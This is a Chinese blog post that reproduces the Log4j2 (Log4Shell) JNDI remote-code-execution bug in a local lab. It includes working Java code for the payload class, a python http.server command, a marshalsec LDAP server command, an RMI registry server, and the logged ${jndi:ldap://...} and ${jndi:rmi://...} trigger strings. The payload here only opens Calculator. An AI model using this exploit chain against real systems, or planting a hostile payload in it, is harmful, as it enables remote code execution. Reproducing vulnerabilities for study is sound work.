Log4j2高危漏洞復(fù)現(xiàn)流程

背景

?Apache Log4j2是一個(gè)基于Java的日志記錄工具,該工具重寫了Log4j框架,并且引入了大量豐富的特性,Apache log4j-2是Log4j的升級版,這個(gè)日志框架被大量用于業(yè)務(wù)系統(tǒng)開發(fā),用來記錄日志信息。在大多數(shù)情況下,開發(fā)者可能會將用戶輸入導(dǎo)致的錯(cuò)誤信息寫入日志中,而攻擊者則可以利用此特性通過該漏洞構(gòu)造特殊的數(shù)據(jù)請求包,最終觸發(fā)遠(yuǎn)程代碼執(zhí)行。
?本文章主要是處于個(gè)人興趣想去復(fù)現(xiàn)一下 Log4j2的漏洞,事先聲明本人對安全領(lǐng)域一竅不通,只是之前碰巧讀過部分 Log4j 的代碼,所以有興趣研究下這個(gè)問題的根源,當(dāng)然這篇文章只是告訴大家怎么去復(fù)現(xiàn)這個(gè)問題。關(guān)于 Log4j2部分的源碼得等下篇文章了。


環(huán)境介紹

  • 操作系統(tǒng):macOS Catalina
  • java version "1.8.0_191"
  • LDAP服務(wù)端
  • python3.x
  • 手寫 RMI 服務(wù)端以及測試代碼。


LDAP 方式復(fù)現(xiàn)

  • 1.手寫hack 代碼用于啟動(dòng)mac 系統(tǒng)的計(jì)算器 java 代碼,編譯成class 文件。
  • 2.在 class 目錄通過 python3 -m http.server 啟動(dòng)服務(wù)后能夠通過 http 協(xié)議訪到 hack 的 class 文件。
  • 3.通過marshalsec啟動(dòng)一個(gè) LDAP 服務(wù)器,代碼開源可以手動(dòng)各種操作,編譯成 jar 包參考LDAP服務(wù)端。
  • 4.通過 log4j2的打印日志然后訪問 hack 代碼啟動(dòng)本地計(jì)算器。
public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("執(zhí)行漏洞代碼");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成執(zhí)行漏洞代碼");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代碼負(fù)責(zé)啟動(dòng)mac系統(tǒng)的計(jì)算器。


python3 -m http.server 8000

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"
  • 在 hack 的class文件所在目錄通 python3啟動(dòng)http服務(wù)暴露 hack 的 class 文件。
  • 通過marshalsec的開源軟件啟動(dòng) LDAP 服務(wù),參考LDAP服務(wù)端。


package com.bug;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
        try {
            Thread.sleep(1000);
        } catch (Exception e) {

        }
    }
}
  • 通過 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}喚起本地計(jì)算器。
  • 不同的 JDK 對于com.sun.jndi.ldap.object.trustURLCodebase的默認(rèn)值不一樣,所以為了測試統(tǒng)一設(shè)置成true 便于觸發(fā)。
  • 不同的 JDK 版本的默認(rèn)值可能導(dǎo)致這個(gè) bug 不會被觸發(fā)。


RMI 方式復(fù)現(xiàn)

  • 1.手寫hack 代碼用于啟動(dòng)mac 系統(tǒng)的計(jì)算器 java 代碼,編譯成class 文件。
  • 2.手寫 RMI 的服務(wù)端代碼。
  • 3.通過 log4j2的打印日志然后訪問 hack 代碼啟動(dòng)本地計(jì)算器。
package com.bug;

public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("執(zhí)行漏洞代碼");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成執(zhí)行漏洞代碼");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代碼負(fù)責(zé)啟動(dòng)mac系統(tǒng)的計(jì)算器。


package com.bug;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            Reference reference = new Reference("com.bug.BugFinder",
                    "com.bug.BugFinder", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

            registry.bind("BugFinder", referenceWrapper);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
  • RMI 的服務(wù)端代碼,啟動(dòng)1099端口進(jìn)行監(jiān)聽。對應(yīng) log4j2的日志通過"jndi:rmi://192.168.0.3:1099/BugFinder"進(jìn)行訪問呢。
  • Reference的參數(shù)com.bug.BugFinder就是 hack 代碼的class 路徑。


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");

        try {
            Thread.sleep(1000);
        } catch (Exception e) {
        }
    }
}
  • 執(zhí)行 log4j2的 error 日志,參數(shù)為${jndi:rmi://192.168.0.3:1099/BugFinder},會觸發(fā)mac 系統(tǒng)打開計(jì)算器。
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容